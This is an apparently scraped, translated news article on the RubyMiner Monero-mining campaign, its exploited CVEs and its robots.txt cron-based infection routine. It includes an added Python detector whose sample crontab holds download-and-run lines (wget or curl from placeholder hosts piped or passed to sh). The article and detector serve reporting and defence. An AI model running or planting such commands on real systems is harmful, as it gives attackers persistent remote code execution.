Note: Monero mining malware has targeted Linux and Windows servers.

Source: Internet
Author: User


A report released by Check Point and Certego points out that the new cryptocurrency mining malware RubyMiner has recently been using a number of vulnerabilities to search the Internet for outdated Web servers and attempt to infect them.

Attackers target Linux and Windows servers.

Stefan Tanase, a security researcher at Ixia, said RubyMiner uses the fingerprinting tool p0f to scan for and identify Linux and Windows servers running outdated software. Once an unpatched server is identified, the attackers exploit known vulnerabilities to break into the server and install RubyMiner on it.

Check Point and Ixia said they found the attackers using the following vulnerabilities in the recent attacks:

Ruby on Rails XML processor YAML deserialization code execution vulnerability (CVE-2013-0156)

PHP php-cgi query string parameter code execution vulnerabilities (CVE-2012-1823, CVE-2012-2311, CVE-2012-2335, CVE-2012-2336, CVE-2013-4878)

Microsoft IIS ASP script source code disclosure vulnerability (CVE-2005-2678)

As this list shows, RubyMiner targets both Windows and Linux systems.

Attackers hide the malicious code in robots.txt files.

Based on data collected by its honeypots, Check Point analyzed the Linux infection routine of RubyMiner and concluded that:

The exploit payloads consist of a series of shell commands;

The attackers first clear all existing cron jobs;

They then add a cron job that runs every hour;

The new cron job downloads a script hosted online;

The scripts are hosted in the robots.txt files of several different domains;

The script downloads and installs a modified version of the XMRig Monero mining application.
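As an added example (not code from the report or from this article), the following Python check scans a crontab for the persistence pattern described above: entries that fetch a robots.txt URL and hand the result to a shell, with hourly scheduling noted as an extra indicator. The crontab text, domains and paths are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab; the two last entries mimic the described
# behaviour with placeholder domains, they are not real indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * /opt/app/bin/healthcheck.sh >/dev/null 2>&1
1 * * * * wget -q -O - http://example.invalid/robots.txt | bash
0 * * * * curl -s http://loader.example.invalid/robots.txt -o /tmp/r.txt; sh /tmp/r.txt
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
# Output piped into a shell, or a shell run on a file in a world-writable dir.
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b|\b(ba|da|z)?sh\s+(/tmp|/dev/shm|/var/tmp)/")
ROBOTS_URL = re.compile(r"https?://[^\s'\"]+/robots\.txt", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list = field(default_factory=list)


def _runs_hourly(schedule):
    """True for a fixed minute with hour == '*', e.g. '0 * * * *'."""
    minute, hour = schedule[0], schedule[1]
    return hour == "*" and minute.isdigit()


def suspicious_cron_entries(crontab_text):
    """Return Findings for crontab lines matching the RubyMiner-style pattern."""
    findings = []
    for n, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # not a full five-field schedule plus command
        schedule, command = parts[:5], parts[5]
        reasons = []
        if ROBOTS_URL.search(command):
            reasons.append("fetches a robots.txt URL as a payload")
        if FETCH_TOOLS.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("downloads content and hands it to a shell")
        if reasons and _runs_hourly(schedule):
            reasons.append("scheduled hourly")
        if reasons:
            findings.append(Finding(n, command, reasons))
    return findings


if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.command}\n  " + "; ".join(f.reasons))
```

On a live host the same function can be run over the output of `crontab -l` for each user and the files under /etc/cron.d; an empty crontab on a server that used to have jobs is itself worth a look, since the described routine clears existing entries first.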

Check Point security researcher Lotem Finkelsteen said they found that the attackers also targeted Windows IIS servers, but have not yet obtained a copy of the Windows version of the malware.

Researchers also found that one of the domains whose robots.txt file hides the malicious commands (lochjol [.] com) was used in a malware campaign in 2013. That earlier campaign also exploited the Ruby on Rails vulnerability now used by RubyMiner, which suggests that both sets of attacks are carried out by the same group.

RubyMiner has infected 700 servers

According to Check Point estimates, about 700 servers are infected with RubyMiner. Based on the wallet addresses found in the custom mining program deployed by RubyMiner, the attackers have earned about $540.

Researchers believe the success rate would be higher if the attackers exploited recent vulnerabilities rather than ones discovered 10 years ago. For example, a recent media report said that in October 2017 attackers exploited an Oracle WebLogic Server vulnerability to earn about $0.226 million.

Monero mining malware continues to increase

In recent months, cryptocurrency mining attacks have been rampant, especially Monero mining malware. Beyond Monero cryptojacking incidents, a large number of Monero mining malware families emerged in 2017, including Digmine, Hexmen, Loapi, Zealot, WaterMiner, CodeFork, and Bondnet. Two weeks ago, in early 2018, researchers discovered the PyCryptoMiner malware targeting Linux servers. Researchers also found hackers exploiting the Oracle WebLogic vulnerability to mine Monero.

In most of the mining attacks against Web servers mentioned above, the attackers attempt to exploit the latest vulnerabilities. RubyMiner is unusual because its attackers exploit very old vulnerabilities. Finkelsteen said the attackers may be deliberately searching the network for machines that system administrators have forgotten about and that still run older server software. Infecting such devices offers the potential for long-term, undisturbed mining.
